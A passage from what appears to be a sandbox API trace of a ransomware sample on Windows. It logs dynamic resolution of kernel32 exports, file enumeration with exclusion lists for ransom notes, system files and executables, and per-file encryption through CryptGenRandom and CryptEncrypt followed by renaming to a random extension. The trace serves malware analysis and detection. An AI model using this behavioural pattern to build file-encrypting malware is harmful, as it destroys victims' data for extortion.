lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.137] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.137] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.137] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.137] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.137] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.137] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.137] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.138] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.138] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.138] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.138] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.138] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.138] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.138] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.138] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.138] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.138] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.138] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.138] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.138] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.138] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png") returned 69 [0086.139] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png.1pRCoQE") returned 77 [0086.139] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\6pqbafab59 bjsw9true.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\6pqbaFAB59 bjsw9TrUE.png.1pRCoQE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\6pqbafab59 bjsw9true.png.1prcoqe"), dwFlags=0x0) returned 1 [0086.139] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.139] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.145] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.145] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4ee8860, ftCreationTime.dwHighDateTime=0x1d4d4fb, ftLastAccessTime.dwLowDateTime=0x1fa0a480, ftLastAccessTime.dwHighDateTime=0x1d4cf4d, ftLastWriteTime.dwLowDateTime=0x1fa0a480, ftLastWriteTime.dwHighDateTime=0x1d4cf4d, nFileSizeHigh=0x0, nFileSizeLow=0x14ee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtMZ-q0LNqQWL.png", cAlternateFileName="AVTMZ-~1.PNG")) returned 1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="DECRYPT-FILES.txt") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="autorun.inf") returned 1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="boot.ini") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="desktop.ini") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="ntuser.dat") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="iconcache.db") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="bootsect.bak") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="ntuser.dat.log") returned -1 [0086.145] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="thumbs.db") returned -1 [0086.146] lstrcmpiW (lpString1="avtMZ-q0LNqQWL.png", lpString2="Bootfont.bin") returned -1 [0086.146] lstrlenW (lpString="avtMZ-q0LNqQWL.png") returned 18 [0086.146] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.146] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.146] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.146] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.146] lstrlenW (lpString="avtMZ-q0LNqQWL.png") returned 18 [0086.146] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="avtMZ-q0LNqQWL.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png" [0086.146] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\avtmz-q0lnqqwl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.146] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=85736) returned 1 [0086.146] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.146] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.147] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.147] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.147] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.149] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.149] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.150] CloseHandle (hObject=0x42c) returned 1 [0086.150] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.150] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.151] CloseHandle (hObject=0x0) returned 0 [0086.151] CloseHandle (hObject=0x428) returned 1 [0086.151] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.151] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.151] GetTickCount () returned 0x114dfd4 [0086.151] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.152] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.152] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.152] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.152] lstrlenA (lpString="kernel32.dll") returned 12 [0086.152] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.152] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.152] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.153] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.153] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.153] lstrlenA (lpString="ADDATOMA") returned 8 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.153] lstrlenA (lpString="ADDATOMW") returned 8 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.153] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.153] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.153] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.153] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.153] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.153] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.153] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.153] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.153] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.153] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.153] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.153] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.153] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.154] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.154] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.154] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.154] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.154] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.154] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.154] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.154] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.154] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.154] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.154] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.154] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.154] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.154] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.154] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.154] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.154] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.154] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.154] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.155] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.155] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.155] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.155] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.155] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.155] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.155] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.155] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.155] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.155] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.155] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.155] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.155] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.155] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.155] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.155] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.155] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.155] lstrlenA (lpString="BEEP") returned 4 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.156] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.156] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.156] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.156] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.156] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.156] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.156] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.156] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.156] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.156] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.156] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 